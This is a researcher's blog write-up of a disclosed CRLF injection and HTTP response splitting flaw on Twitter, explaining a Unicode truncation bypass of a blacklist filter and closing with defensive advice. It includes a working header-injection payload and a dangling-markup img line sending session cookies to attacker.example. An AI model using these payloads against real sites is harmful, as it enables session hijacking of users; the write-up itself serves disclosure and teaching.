tl;dr Don't use blacklists

In this blog post, I would like to discourage developers from employing any blacklist-based protection, with a write-up of a CRLF Injection/HTTP Response Splitting vulnerability on Twitter.

Websec 101

For those who don't know, a CRLF Injection attack usually occurs when an input is reflected in a header field of an HTTP response. If the output is not properly sanitized, attackers can inject arbitrary headers or content into the response. It may result in Open Redirect (Location), Session Fixation (Set-Cookie), XSS and whatnot.
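
Here is a minimal sketch of the vulnerable pattern in Python (the parameter name and cookie are made up for illustration):

# A request parameter is reflected into a response header unsanitized
lang = "en\r\nSet-Cookie: sid=attacker"  # attacker-controlled input
response = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: lang=" + lang + "\r\n"  # the injection point
    "\r\n"
    "<html>...</html>"
)
print(response)
# The injected CRLF terminates the Set-Cookie header early and smuggles
# in a second header that fixes the victim's session cookie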

The Story

Once upon a time, Twitter set up a page for ad haters to report ads violations. On the page, a couple of inputs are reflected in Set-Cookie. After a bit of fiddling, I discovered that non-printable control characters were not encoded as they should be. However, this issue alone did not lead to big problems because the two critical control characters (CR and LF) were sanitized. More precisely, LF was replaced with a space and CR would result in HTTP 400 (Bad Request). Now what?
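
For reference, this is my reading of the filter based on the observed behavior (a reconstruction, not Twitter's actual code):

def blacklist_filter(value):
    # Reconstructed from observed behavior, not Twitter's actual code
    if "\r" in value:
        raise ValueError("400 Bad Request")  # CR is rejected outright
    return value.replace("\n", " ")          # LF is replaced with a space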

Mama always told me to learn from past experience.

After a moment, I recalled there was an encoding bug in Firefox involving some spec misbehavior. Basically, RFC 7230 states that most HTTP header field values use only a subset of the US-ASCII charset. Firefox followed the spec by truncating any out-of-range characters to their lowest byte when setting cookies, instead of encoding them. The problem is obvious: a blacklist-based filter will fail because the input is safe until it is mutated.
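
A sketch of that mutation (not Firefox's actual source), assuming the truncation keeps only the lowest byte of each character:

def truncate_to_low_byte(value):
    # Out-of-range characters are reduced to their lowest byte
    # instead of being encoded or rejected
    return "".join(chr(ord(ch) & 0xFF) for ch in value)

print(repr(truncate_to_low_byte("\u560a")))  # '\n' -- U+560A becomes LF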

At this point you might think we can use that to bypass the detection by submitting a Unicode character which takes CR/LF as its last byte. This is actually not quite accurate. For example, a character like "嘊" (U+560A, %56%0a) still contains the LF byte and hence can still be spotted.
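
You can see the literal LF in the raw code-point bytes:

print("\u560a".encode("utf-16-be"))  # b'V\n' -- 0x56 0x0A, the LF byte is right there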

Plot Twist

But don't forget we use UTF-8 to encode URLs. That means we can use %E5%98%8A to represent U+560A. Surprisingly, Twitter decodes the input but does not re-encode it in the output. So the flow is as follows (sketched in code after the list):

  1. We send the server a payload containing crafted Unicode characters whose last byte is CR/LF, encoded in UTF-8
  2. Server receives the request but does not detect any malicious character
  3. Server decodes the input and truncates out-of-range characters to their lowest byte
  4. The output then contains clean CR/LF characters
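
Putting it together (the truncation step is my reconstruction of the observed behavior):

from urllib.parse import unquote

payload = "%E5%98%8A"  # UTF-8 percent-encoding of U+560A

# Steps 1-2: the blacklist inspects the raw input and finds no CR/LF
assert "\r" not in payload and "\n" not in payload

# Step 3: the server decodes the input ...
decoded = unquote(payload)  # '嘊' (U+560A)

# Step 4: ... and truncating to the lowest byte yields a clean LF
mutated = "".join(chr(ord(ch) & 0xFF) for ch in decoded)
print(repr(mutated))  # '\n'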

Character Mutation

Now we can manipulate headers and content by injecting CR/LF characters. For your information, here is a payload that sets a cookie: %E5%98%8A%E5%98%8DSet-Cookie:%20test
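
Decoding it shows where the line break comes from (%E5%98%8D is U+560D, whose last byte is CR):

from urllib.parse import unquote

payload = "%E5%98%8A%E5%98%8DSet-Cookie:%20test"
decoded = unquote(payload)  # '嘊嘍Set-Cookie: test'
mutated = "".join(chr(ord(ch) & 0xFF) for ch in decoded)
print(repr(mutated))  # '\n\rSet-Cookie: test'

Note the pair comes out as LF CR rather than CR LF; in practice HTTP parsers are lenient enough to treat a bare LF as a line break.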

And So On...

Initially I thought this issue only happened in Set-Cookie. After reporting it to Twitter, I realized that any page that reflects inputs to header fields was vulnerable. That got me thinking whether we could go beyond XSS. While wandering around, I noticed that Twitter sets the cookie twitter_sess for every response, and apparently we can't extract it via XSS as it is protected by HttpOnly. A quick thought came to mind: if the Set-Cookie header for twitter_sess appears after the injection point, then we can make it a part of the response body and extract it. Consider the following example where the value of foo is the injection point:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8[CR][LF]
Set-Cookie: foo=[CR][LF]
[CR][LF]
<img src="
Set-Cookie: twitter_sess=[...]; HttpOnly[CR][LF]
[CR][LF]
<p class="twttr">Original response body</p>

And after that we can use dangling markup or normal XSS to get a victim's session.
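
A sketch of the dangling-markup variant (attacker.example is a placeholder): the injected body opens an attribute that is never closed, so everything up to the next quote, including the twitter_sess cookie, becomes part of the image URL and is sent to the attacker's server when the browser fetches the image:

<img src="https://attacker.example/steal?leak=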

Although we could not perform the attack on the ads report page, because its Set-Cookie header for twitter_sess appears before the injection point, there are other affected pages that meet the attack requirements mentioned above.

Ending

While testing the attack, I also found that Twitter now uses auth_token instead of twitter_sess for the user session. Luckily, the login page contains the Set-Cookie header for auth_token, and it accepts a parameter redirect_after_login that redirects the user after logging in. The only barrier left was to stop the redirection and make browsers render the page. This could be solved with Positive Technologies' research.

So there you have it. CRLF Injection and session takeover on Twitter. The prince and the princess lived happily ever after.

Conclusion

Do not rely on blacklists. Developers should either encode (or escape) the outputs or employ whitelist-based protections. In fact, Twitter fixed it in a somewhat monkey-patch fashion: out-of-range characters are now disallowed, but it still does not completely follow the spec. A better fix would be to limit the input format (e.g. alphanumeric only); or even better, encode the outputs.
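
A sketch of both options (hypothetical helpers, not Twitter's fix):

import re
from urllib.parse import quote

def whitelisted_header_value(value):
    # Option 1: whitelist -- accept alphanumeric input only
    if not re.fullmatch(r"[A-Za-z0-9]+", value):
        raise ValueError("invalid header value")
    return value

def encoded_header_value(value):
    # Option 2: encode -- percent-encode everything outside a safe set
    return quote(value, safe="")

print(encoded_header_value("\u560a"))  # %E5%98%8A -- no mutation possible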

References

Original report from HackerOne